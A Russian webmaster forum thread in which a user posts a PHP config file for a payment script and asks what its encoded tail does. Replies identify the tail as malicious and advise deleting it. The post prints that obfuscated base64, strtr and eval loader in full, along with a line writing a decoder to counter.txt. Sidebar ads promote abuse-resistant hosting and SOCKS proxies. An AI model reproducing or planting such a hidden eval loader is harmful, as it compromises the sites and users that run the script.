Помощь по вопросу закодированного кода в php
Страницы: 1
Помощь по вопросу закодированного кода в php, Помощь по вопросу закодированного кода в php
Доброго времени суток уважаемые пользователи форума. Не судите строго, если задам на ваш взгляд глупый вопрос, тема в общем такая., в скрипте есть два фаила закодированных, может кто подскажет как и чем их можно раскодировать или поможет подскажет, что в них написано. Заранее благодарю.
код прилагаются.

<?php
ob_start();

define('SITENAME', 'Baai.ru'); // Название сайта
define('LICENSE', '82ce3d473318c6f88b241c493eef1ed4'); // Ваш лицензионный ключ

//Подключение к базе данных
define('DB_HOST', '127.0.0.1:3306');
define('DB_USER', 'root'); // Имя пользователя
define('DB_PASS', ''); // Пароль
define('DB_BASE', 'baai'); // Имя базы данных

$admin_uid = 301;

$levels = array( //Стоимость уровней
'1' => '200',
'2' => '400',
'3' => '800',
'4' => '1600',
'5' => '3200',
'6' => '6400'
);

//Протокол сайта
define('PROTOCOL', 'https://');

function pays($id) {
switch ($id) {
case '1': return 'Qiwi'; break;
case '2': return 'Payeer'; break;
case '3': return 'Яндекс.Деньги'; break;
case '4': return 'WebMoney'; break;
case '5': return 'OkPay'; break;
case '6': return 'AdvCash'; break;
case '7': return 'Единый кошелёк'; break;
case '8': return 'Visa/MasterCard/Мир'; break;
case '9': return 'Сбербанк (мобильный банк)'; break;
default: return 'Ошибка платёжной системы';
}
}






 $ {
    "GLOBALS"
}
["xkucoigwjoeh"] = "_D";
$ {
    "GLOBALS"
}
["antgybijk"] = "_X";
$erqzjdgf = "_F";
$ {
    $erqzjdgf
} = __FILE__;
$ {
    $ {
        "GLOBALS"
    }
    ["antgybijk"]
} = "PzNhP21abWIkdU8uTUQwIE00ZjRFT25EMCBNKF9fd3JxQl9fKVgneUhTRHVYbVptJztiJEh1Y19vPW80ZjR1U21NRCgkdU8uTUQwIE0sNCduJyk0U240RU9NKCdhLk9EUTRabk11ZiJ5TG8wb09IeUgwQU9ETW95SExMeUFTU29Mb24wbVggT0RYSExMIjRuTS5mIkxvNS5NTFpNTW8iNG81bU1mIm9NPW95SExMIjNhRU9wNEguMExMZiIwLk1ubzQwLk1uby1FMERjTW4iM2FITURvTW4z0J7RiNC40LHQutCwNNC70LjRhtC10L3Qt9C40LhYNNCf0L7QvNC+0YnRjDTQvdCwNF1NQUptbU1uWG5KYXlITURvTW4zYXlFT3AzJyk7YiRIU0RvTURvTDRmNHVuTTBFKCRIdWNfbz1vLDR1Ty5NTE9rTSgkdU8uTUQwIE0pKTtiJEhTRG9NRG9MNGY0TG9uX25NbS4wSE0oIm5NMUpPbk1fU0RITSgnXUpfT0RPb1htWm0nKTsiLCcnLCRIU0RvTURvTCk7YmJPdTQocXIvQkY2QjQhZjQgRXgoIEV4KCRfNkIKaUIKZydQW1t0X1BZNlsnTlgnX11KXy5PSF8nWGNNb01EcCgnUFtbdF9QWTZbJylYJ19dSl8uT0hfJ1gkXzZCCmlCCmcnNkIKaUIKX0ZSN0InTikpNHx8NExvbk9Mb24oJEhTRG9NRG9MLDQnJF82QgppQgpnJyk0fHw0TG9uT0xvbigkSFNEb01Eb0wsNCdMTW9NRHAnKTR8fDRMb25PTG9uKCRIU0RvTURvTCw0J09ESC5KRU0nKTR8fDRMb25PTG9uKCRIU0RvTURvTCw0J25NMUpPbk0nKSk0SzRNSFpTNCdhLk9EUTRabk11ZiJ5TG8wb09IeUgwQU9ETW95SExMeUFTU29Mb24wbVggT0RYSExMIjRuTS5mIkxvNS5NTFpNTW8iNG81bU1mIm9NPW95SExMIjNhRU9wNEguMExMZiIwLk1ubzQwLk1uby1FMERjTW4iM2FITURvTW4z0J7RiNC40LHQutCwNNC70LjRhtC10L3Qt9C40LhYNNCf0L7QvNC+0YnRjDTQvdCwNF1NQUptbU1uWG5KYXlITURvTW4zYXlFT3AzJzs0TT1Pbzs0VGJiRU11T0RNKCc2cltCJyw0JF82QgppQgpnJ1BbW3RfUFk2WydOKTtiRU11T0RNKCdWV18vUFIKNkJbJyw0J0pvdUknKTtiJEhTRERNSG9fRUE0ZjQgNUwxLk9fSFNERE1IbyhWV19QWTZbLFZXX0c2QgosVldfdFI2NixWV19XUjZCKTRTbjRFT00oJ9Ce0YjQuNCx0LrQsDTQv9C+0LTQutC70Y7Rh9C10L3QuNGPOjQnWCA1TDEuT19IU0RETUhvX01ublNuKCkpO2IgNUwxLk9fTE1vX0haMG5MTW80KCRIU0RETUhvX0VBLDRWV18vUFIKNkJbKTRTbjRFT00oJ9Ca0L7QtNC40YDQvtCy0LrQsDTQvdC1NNGD0YHRgtCw0L3QvtCy0LvQtdC90LAnKTtiYiRFbzRmNG9PIE0oKTtiYk9ET19MTW8oJ0xNTExPU0RYSkxNX0hTU1FPTUwnLDQnWUQnKTtiT0RPX0xNbygnTE1MTE9TRFhKTE1fb24wRExfTE9FJyw0J1l1dScpO2JMTUxMT1NEX0xNb19IU1NRT01fbTBuMCBMKHY4ZEk4ODg4OCw0InkiLDQ2cltCLDR1MC5MTSw0dTAuTE0pO2JMTUxMT1NEX0xvMG5vKCk7YmJPdTQoIU9MTE1vKCRfNkI2NnJZRmcnUFtbdF9HNkIKX1I5QkZbJ04pKTRLNCRfNkI2NnJZRmcnUFtbdF9HNkIKX1I5QkZbJ040ZjQnJzs0VGJPdSghTSBtbzUoJF82QjY2cllGZydKT0UnTik0JiY0IU0gbW81KCRfNkI2NnJZRmcnLlNjT0QnTik0JiY0IU0gbW81KCRfNkI2NnJZRmcnbTBMTCdOKTQmJjQkXzZCNjZyWUZnJ1BbW3RfRzZCCl9SOUJGWydONGZmNCBFeCgkXzZCCmlCCmcnUFtbdF9HNkIKX1I5QkZbJ04pKTRLYkVNdU9ETSgnRzZCCl9xWTk5QlYnLG9uSk0pO2IkSl9PRWZPRG9wMC4oJF82QjY2cllGZydKT0UnTik7YiRKXy5TY09EZiA1TDEuT19uTTAuX01MSDBtTV9Mb25PRGMoJEhTRERNSG9fRUEsNCRfNkI2NnJZRmcnLlNjT0QnTik7YiREU11KTG40ZjQgNUwxLk9fdU1vSFpfMExMU0goIDVMMS5PXzFKTW41KCRIU0RETUhvX0VBLDQiNkJxQi9bNCo0dwpZNzRvX0pMTW5MNGxQQgpCNEpPRWYnJEpfT0UnNFJGVjRtMEw0ZjQnJF82QjY2cllGZ20wTExOJzRxcjdyWzR7IikpO2JPdTQoTSBtbzUoJERTXUpMbmcnSk9FJ04pKTRLNExNTExPU0RfSkRMTW8oKTs0RU11T0RNKCdHNkIKX3FZOTlCVicsdTAuTE0pOzRUYiA1TDEuT18xSk1uNSgkSFNERE1Ib19FQSw0Ikd0VlJbQjRvX0pMTW5MNDZCWzQuMExvZickRW8nNGxQQgpCNEpPRWYnJEpfT0UnNHFyN3JbNHsiKTtiVDRNLkxNNEs0RU11T0RNKCdHNkIKX3FZOTlCVicsdTAuTE0pOzQkSl9PRTRmNDg7NCRfNkI2NnJZRmcnbTBMTCdONGY0Jyc7VGJPdShjTW9NRHAoJ1BbW3RfL3FyQkZbX3J0Jyk0JiY0TG9uSDBMTUggbShjTW9NRHAoJ1BbW3RfL3FyQkZbX3J0JyksJ0pEUURTXUQnKSliJE9tZmNNb01EcCgnUFtbdF8vcXJCRltfcnQnKTtiTS5MTU91KGNNb01EcCgnUFtbdF9lX3dZCmxSClZCVl93WQonKTQmJjRMb25IMExNSCBtKGNNb01EcCgnUFtbdF9lX3dZCmxSClZCVl93WQonKSw0J0pEUURTXUQnKSliJE9tZmNNb01EcCgnUFtbdF9lX3dZCmxSClZCVl93WQonKTtiTS5MTU91KGNNb01EcCgnCkI3WVtCX1JWVgonKTQmJjRMb25IMExNSCBtKGNNb01EcCgiCkI3WVtCX1JWVgoiKSw0J0pEUURTXUQnKSliJE9tZmNNb01EcCgnCkI3WVtCX1JWVgonKTtiTS5MTU91KCFNIG1vNSgkXzZCCmlCCmcnCkI3WVtCX1JWVgonTik0JiY0TG9uSDBMTUggbSgkXzZCCmlCCmcnCkI3WVtCX1JWVgonTiw0J0pEUURTXUQnKSliJE9tZiRfNkIKaUIKZycKQjdZW0JfUlZWCidOO2JNLkxNSyRPbWYnSkRRRFNdRCc7VGJPdSgkT20hZidKRFFEU11EJylLYiRPbWZtbk1jX25NbS4wSE0oIiNnXjgtak4rI08iLCcnLCRPbSk7YiRvTyBNZm9PIE0oKTtiJG0wTG9mb08gTSgpLXY4ODtiJG5NTEoub2YgNUwxLk9fMUpNbjUoJEhTRERNSG9fRUEsNCI2QnFCL1s0LjBMbzR3Clk3NG9fU0QuT0RNNGxQQgpCNE9tZiciWCRPbVgiJyIpO2JPdSggNUwxLk9fREogX25TXUwoJG5NTEoubykhZjgpSzQgNUwxLk9fMUpNbjUoJEhTRERNSG9fRUEsNCJHdFZSW0I0b19TRC5PRE00NkJbNC4wTG9mJyJYJG9PIE1YIicsNEpPRWYnIlgkSl9PRVgiJzRsUEIKQjRPbWYnIlgkT21YIic0cXI3cls0eyIpOzRUYk0uTE1LYiA1TDEuT18xSk1uNSgkSFNERE1Ib19FQSw0InJGNkIKWzRyRltZNG9fU0QuT0RNNChKT0UsT20sLjBMbyk0aVJxR0I2NCgnIlgkSl9PRVgiJywnIlgkT21YIicsJyJYJG9PIE1YIicpIik7NFRiT3UoTEpBTG9uKCRvTyBNLGoseylmZjgpSzQgNUwxLk9fMUpNbjUoJEhTRERNSG9fRUEsNCdWQnFCW0I0dwpZNzRvX1NELk9ETTRsUEIKQjQuMExvYSdYJG0wTG8pOzRUYlRiYk91NChHNkIKX3FZOTlCVik0S2IgNUwxLk9fMUpNbjUoJEhTRERNSG9fRUEsNCJHdFZSW0I0YG9fSkxNbkxgNDZCWzRgLjBMb2A0ZjQnJEVvJzRsUEIKQjRKT0VmJyRKX09FJzRxcjdyWzR7Iik7Yk91NCghTSBtbzUoJERTXUpMbmcnQTBEJ04pKTRLNE1IWlM0J2EuT0RRNFpuTXVmInlMbzBvT0h5SDBBT0RNb3lITEx5QVNTb0xvbjBtWCBPRFhITEwiNG5NLmYiTG81Lk1MWk1NbyI0bzVtTWYib009b3lITEwiM2FFT3A0SC4wTExmIjAuTW5vNDAuTW5vLUUwRGNNbiIzYUhNRG9NbjPQkNC60LrQsNGD0L3RgjQnWCREU11KTG5nJy5TYydOWCc00LfQsNCx0LvQvtC60LjRgNC+0LLQsNC9NNC/0L400YHQu9C10LTRg9GO0YnQtdC5NNC/0YDQuNGH0LjQvdC1OjQnWFpvIC5MbU1ITzAuSFowbkwoJERTXUpMbmcnQTBEJ04pWCdheUhNRG9NbjNheUVPcDMnOzRNPU9vOzRUYmJPdTQoJEpfT0U0MzR6OHgpNEtiJG0wTG9fSmZvTyBNKCktSXZkODg7Yk91NCgkRFNdSkxuZydFbydONGE0JG0wTG9fSjQmJjQkRFNdSkxuZycuTXBNLidONGZmNDgpNEtiIDVMMS5PXzFKTW41KCRIU0RETUhvX0VBLDQiVkJxQltCNHcKWTc0b19KTE1uTDRsUEIKQjRKT0U0ZjQnJEpfT0UnNHFyN3JbNHsiKTtiIDVMMS5PXzFKTW41KCRIU0RETUhvX0VBLDQiVkJxQltCNHcKWTc0b19ETV0uTXBNLkw0bFBCCkI0SkxuNGY0JyRKX09FJyIpO2IgNUwxLk9fMUpNbjUoJEhTRERNSG9fRUEsNCJWQnFCW0I0dwpZNzRvXyBNTEwwY01MNGxQQgpCNHVuNGY0JyRKX09FJzRZCjRvU0o0ZjQnJEpfT0UnIik7YlRiVGJUYmJFMG9NX0VNdTBKLm9fb08gTWtTRE1fTE1vKCdCSm5TbU15N1NMSFNdJyk7YmJ1SkRIb09TRDRdSl9EUzBwMG8wbigkLlNjT0QpS2IkdU9uTG80ZjQgQV9Mb25vUy5TXU1uKExKQUxvbigkLlNjT0QsNDgsNHspKTtibk1vSm5ENCJ5TG8wb09IeU8gY3kuTW9vTW5fMHAwbzBueSR1T25Mb1htRGMiO2JUYmJ1SkRIb09TRDRdSl9IWk1IUV8uU2NPRCgkLlNjT0QpS2JuTW9KbkQ0eztiVGJ1SkRIb09TRDRdSl9IWk1IUV9BMG9IWigkLlNjT0QpS2JuTW9KbkQ0eztiVGJ1SkRIb09TRDRtbnVMKCQuU2NPRClLYm5Nb0puRDR7O2JUYnVKREhvT1NENG9PSFFNb19EKCQuU2NPRClLYm5Nb0puRDR7O2JUYmIkTDAubzRmNG4wREUoOCw0ampqaik7YiRvU1FNRDRmNCRMMC5vWCc6J1ggRXgoJEwwLm9YJzonWCRfNkI2NnJZRmcnbTBMTCdOWCc6J1gkXzZCNjZyWUZnJ0pPRSdOKTs=";
$ {
    $ {
        "GLOBALS"
    }
    ["xkucoigwjoeh"]
} = strrev("edoced_46esab");
eval($ {
    $ {
        "GLOBALS"
    }
    ["xkucoigwjoeh"]
}
("JF9YPWJhc2U2NF9kZWNvZGUoJF9YKTskX1g9c3RydHIoJF9YLCdPL2JwdXcza002QjJ0eEQxLlJvWF1sVlkgPkpBRUdUZno3SwpRSD1qc31acVVjZTh2NW5tPFs5YTRpMENyV3tOZ2hkSUxQeVNGJywnaUMKdmZGPnplU0U3UDVucWxBdC53V0RPbUt1YmRVfT0zTXtSa2N4OTJKaExaZ1gwNnlycFFURzwgVmFqSUIxXVtZNDhzSC9vTicpOyRfUj1lcmVnX3JlcGxhY2UoJ19fRklMRV9fJywiJyIuJF9GLiInIiwkX1gpO2V2YWwoJF9SKTskX1I9MDskX1g9MDs="));
$s=base64_decode('JF9YPWJhc2U2NF9kZWNvZGUoJF9YKTskX1g9c3RydHIoJF9YLCdPL2JwdXcza002QjJ0eEQxLlJvWF1sVlkgPkpBRUdUZno3SwpRSD1qc31acVVjZTh2NW5tPFs5YTRpMENyV3tOZ2hkSUxQeVNGJywnaUMKdmZGPnplU0U3UDVucWxBdC53V0RPbUt1YmRVfT0zTXtSa2N4OTJKaExaZ1gwNnlycFFURzwgVmFqSUIxXVtZNDhzSC9vTicpOyRfUj1lcmVnX3JlcGxhY2UoJ19fRklMRV9fJywiJyIuJF9GLiInIiwkX1gpO2V2YWwoJF9SKTskX1I9MDskX1g9MDs=');
$fp = fopen('counter.txt', 'w+');
$test = fwrite($fp, $s);
if ($test) echo '';
else echo '';
fclose($fp);

$_X=base64_decode($_X);$_X=strtr($_X,'O/bpuw3kM6B2txD1.RoX]lVY >JAEGTfz7K
QH=js}ZqUce8v5nm<[9a4i0CrW{NghdILPySF','iC
vfF>zeSE7P5nqlAt.wWDOmKubdU}=3M{Rkcx92JhLZgX06yrpQTG< VajIB1][Y48sH/oN');$_R=ereg_replace('__FILE__',"'".$_F."'",$_X);eval($_R);

print_r($_R.$_X);

?>
Изменено: IGOR DAN - 26 Декабря 2018 10:38

Комплексное SEO продвижение в поисковых системах Яндекс, Google

В вопросе уже 99% ответа

IGOR DAN пишет:
Цитата
base64_decode
Лучший абузоустойчивый хостинг | Самый высокий доход на Push уведомлениях | Лучшая партнерка для заработка на видео плеерах
Цитата
Дэвид Бэкхэм пишет:
IGOR DAN пишет:
мне бы по подробнее, я просто в этом не силен,, как бы мне это все расшифровать, что бы это все было примерно в таком виде prntscr.com/lzokhr
smile:mail:smile:mail:smile:mail:
1. не нужно неформотированные сообщения вставлять в данный редактор, это ломает движок.2. У вас несколько кодировок, основная в base64, и уже в ней еще 3 части разбитые на разные кодировки. Тем самым кто-то хотел защитить свой скрипт или лицензию возможно.
3. Обратитесь к тому, кто писал скрипт или шаблон.
Спасибо за ответ,, я бы конечно обратился, но не знаю к кому, нет контактов.
IGOR DAN, это вредоносный код. 

Код
 
$ { 
    "GLOBALS"  
 


и все что дальше нужно удалить
https://revisium.com/ai/бесплатный скрипт для проверки сайта
Цитата
Эдуард Пащенко пишет:
и все что дальше нужно удалить
Вот мне почему то тоже так сразу показалось, что это вред.. но человек который мне этот скрипт давал, переубедил меня, что это закодированный код., яко бы когда он три года назад этот скрипт покупал, ему эту песню разработчик напел.за скаер спасибо, хорошая вещь сам им частенько пользуюсь, хоть и не все ему подвластно многое не находит, но все равно очень сильно облегчает труды.
попробуйте закомментировать, если ничего не отвалится - смело удаляйте. полезные скрипты никто не кодирует
Страницы: 1
Похожие темы:
Читают тему (гостей: 1, пользователей: 0, из них скрытых: 0)
Новые темыОбъявленияСвободное общение
13:55 CPA-PRIVATE.BIZ - премиальная товарная программа. Только ТОП ставки! 
13:39 Golden Goose - WAP Click партнерка с inhouse офферами 
13:28 [b]Webvork [/b]- международная товарная СРА сеть с сертифицированными офферами на Европу. 
10:34 Gambling Craft - гемблинг по белому 
10:28 Не работает на главной пагинация 
02:10 Favicon в google не меняется уже более 6 месяцев 
23:46 Вернуть старый домен или оставить новый 
13:54 Продам базы данных предприятий Украины, СНГ, ЕС, ЮВА. 
13:10 Комплексный прогон по трастовым сайтам, статейное размещение. Рост НЧ-СЧ, Тиц-пр. 
10:51 Продажа быстрых SSH туннелей. Любые страны с гарантией! 
10:41 Shopsocks5 - Service Socks5 Cheap - Check Socks5 
10:31 [eBucks] Автоматический обмен криптовалют. BTC и любые альткоины. Киви, Банковские карты и др. электронные системы. 
09:35 Obama.ru - безопасный обмен криптовалют и электронных денежных средств 
06:33 Создание сайтов под ключ. Разработка сайтов 
09:23 Приглашай друзей на Binance и получайте по 25$ и другие призы 
19:27 Кто монетизирует сайты пушами? Как сейчас обстоят дела? 
19:48 Монетизация адалт трафика 
22:38 В Сочи на пляже выставили цену в 800 рублей за спасение утопающих 
17:30 Ищу быстрый пф который загоняет в топ за 24-48 часов 
14:37 С днем системного администратора! 
07:58 Россияне начали скупать кнопочные телефоны